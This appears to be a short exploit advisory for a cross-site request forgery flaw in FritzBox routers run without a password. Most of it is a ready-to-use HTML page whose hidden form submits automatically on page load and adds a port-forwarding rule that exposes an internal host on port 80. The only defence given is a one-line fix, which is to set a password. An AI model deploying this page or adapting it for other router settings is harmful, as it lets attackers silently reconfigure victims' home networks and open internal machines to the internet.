###################################### # Exploitation: Remote with browser # Exploit: Available # Impact: Medium # Fix: N/A ###################################### #################### - Description: #################### Via XSRF change settings in FritzBox. #################### - Vulnerability: #################### XSRF vulnerability, when you use the FritzBox without passwort login #################### - example Exploit for Portforwarding: #################### <html> <body onLoad="javascript:document.form.submit()"> <form action="http://www.fritz.box/cgi-bin/webcm"; method="POST" name="form"> <input type="hidden" value="getpage" value="../html/de/menus/menu2.html"> <input type="hidden" name="errorpage" value="../html/de/menus/menu2.html"> <input type="hidden" name="var:lang" value="de"> <input type="hidden" name="var:pagename" value="portfw"> <input type="hidden" name="var:errorpagename" value="portrule"> <input type="hidden" name="var:menu" value="internet"> <input type="hidden" name="var:pagemaster" value=""> <input type="hidden" name="var:rule" value="rule3"> <input type="hidden" name="var:isnew" value="1"> <input type="hidden" name="var:isexp" value="0"> <input type="hidden" name="forwardrules:settings/rule3/activated" value="1"> <input type="hidden" name="forwardrules:settings/rule3/description" value="HTTP-Server"> <input type="hidden" name="forwardrules:settings/rule3/protocol" value="TCP"> <input type="hidden" name="forwardrules:settings/rule3/port" value="80"> <input type="hidden" name="forwardrules:settings/rule3/endport" value="80"> <input type="hidden" name="forwardrules:settings/rule3/fwip" value="192.168.178.24"> <input type="hidden" name="forwardrules:settings/rule3/fwport" value="80"> </form> </body> </html> (this is only a example code for portforwarding for other things they are other variables!!!) #################### - Solution: #################### Use FritzBox only with passwort thx to skskilL & NBBN
